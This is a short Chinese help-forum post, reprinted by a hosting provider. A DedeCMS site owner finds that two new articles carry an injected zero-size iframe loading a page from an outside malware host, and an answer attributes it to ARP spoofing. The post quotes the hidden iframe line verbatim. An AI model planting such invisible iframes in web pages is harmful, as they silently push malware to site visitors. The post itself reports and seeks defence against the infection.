刚开3天的小小站,日IP刚过百。
晚上手工刚添加2篇文章,然后自己进首页预览,卡巴报毒,当时开着的就自己的网站,报毒的也就是刚添加的2篇文章,查看原文件,在顶部发现了这样一段:
<iframe src=http://boolom.com/ax.htm?7126?003 width=0 height=0 frameborder=0></iframe>
赶紧看其他文章,没有发现
上FTP看自己的模板文件也没问题
进DEDECMS后台重新更新两篇文章,又没毒了
现求助高手,他是如何进入的?以后如何防范?
回答:你这个是被arp攻击了,具体请参考:
/plus/search.php?kwtype=0&select=titlekeyword&keyword=arp
另外arp专杀的工具:http://top.admin5.com/soft.shtml
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!



